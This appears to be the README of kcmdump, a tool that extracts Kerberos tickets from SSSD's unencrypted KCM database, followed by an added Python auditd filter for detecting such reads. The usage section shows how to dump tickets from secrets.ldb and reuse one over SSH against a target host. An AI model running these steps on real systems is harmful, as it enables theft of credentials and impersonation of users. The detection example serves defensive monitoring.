Dump Kerberos tickets from the KCM database of SSSD

synacktiv/kcmdump

KCM dumper

Quick script to dump the KCM database used by SSSD and recover Kerberos tickets in the CCACHE format.

Initially based on SSSDKCMExtractor and KCMTicketFormatter.

Description

Since version 2.0.0 (2018-08-13), the back-end storage of the SSSD KCM responder no longer encrypts the database content. It still relies on an LDB database (itself based on TDB), which makes it easily searchable using LDAP-like queries.

SSSD uses a custom storage format for Kerberos tickets, which can be converted to standard CCACHE files using this script.

Usage

$ apt install python3-construct python3-ldb
$ python3 kcmdump.py /var/lib/sss/secrets/secrets.ldb
$ ls -lh
-rw-r--r--. 1 root root 1.3K Jan 1 00:00 user_0.ccache
-rw-r--r--. 1 root root 1.8K Jan 1 00:00 kcmdump.py
$ KRB5CCNAME=user_0.ccache klist
$ KRB5CCNAME=user_0.ccache ssh [email protected]@target.corp.local
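
Because the database content is stored unencrypted, a read of secrets.ldb by anything other than the KCM responder is worth alerting on. The following is an added example, not part of kcmdump or SSSD: it filters auditd SYSCALL records for such reads, assuming a watch rule with the hypothetical key `sssd_kcm_db`, the listed responder binary paths, and constructed sample log lines.

```python
import re
import shlex

# Assumption: a file watch was installed beforehand with
#   auditctl -w /var/lib/sss/secrets/secrets.ldb -p r -k sssd_kcm_db
AUDIT_KEY = "sssd_kcm_db"  # hypothetical key name, choose your own
# Assumption: responder paths on RHEL-like and Debian-like hosts; adjust locally.
EXPECTED_EXES = {
    "/usr/libexec/sssd/sssd_kcm",
    "/usr/lib/x86_64-linux-gnu/sssd/sssd_kcm",
}
# Constructed sample SYSCALL records (not captured from a real host).
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1700000000.101:501): arch=c000003e syscall=257 success=yes exit=7 auid=4294967295 uid=0 pid=812 comm="sssd_kcm" exe="/usr/libexec/sssd/sssd_kcm" key="sssd_kcm_db"
type=SYSCALL msg=audit(1700000042.330:502): arch=c000003e syscall=257 success=yes exit=3 auid=1000 uid=0 pid=4410 comm="python3" exe="/usr/bin/python3.11" key="sssd_kcm_db"
type=SYSCALL msg=audit(1700000050.900:503): arch=c000003e syscall=257 success=no exit=-13 auid=1001 uid=1001 pid=4522 comm="cat" exe="/usr/bin/cat" key="sssd_kcm_db"
type=SYSCALL msg=audit(1700000060.000:504): arch=c000003e syscall=59 success=yes exit=0 auid=1000 uid=1000 pid=4600 comm="ls" exe="/usr/bin/ls" key="other_rule"
"""
MSG_RE = re.compile(r"msg=audit\((\d+)\.\d+:(\d+)\):")

def parse_record(line):
    """Split one audit record into key=value fields, stripping quotes."""
    fields = {}
    for token in shlex.split(line):
        key, sep, value = token.partition("=")
        if sep:
            fields[key] = value
    m = MSG_RE.search(line)
    if m:
        fields["epoch"], fields["serial"] = int(m.group(1)), int(m.group(2))
    return fields

def suspicious_reads(log_text):
    """Return watch-key records whose executable is not the KCM responder."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec.get("type") != "SYSCALL" or rec.get("key") != AUDIT_KEY:
            continue
        if rec.get("exe") not in EXPECTED_EXES:
            hits.append({k: rec.get(k) for k in ("serial", "epoch", "exe", "uid", "auid", "success")})
    return hits

if __name__ == "__main__":
    for hit in suspicious_reads(SAMPLE_LOG):
        # Denied attempts (success=no) are kept: they still show probing of the file.
        print(hit)
```

The `auid` field identifies the login session behind a read even when `uid` is 0, which helps tie a root-level access back to an account.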
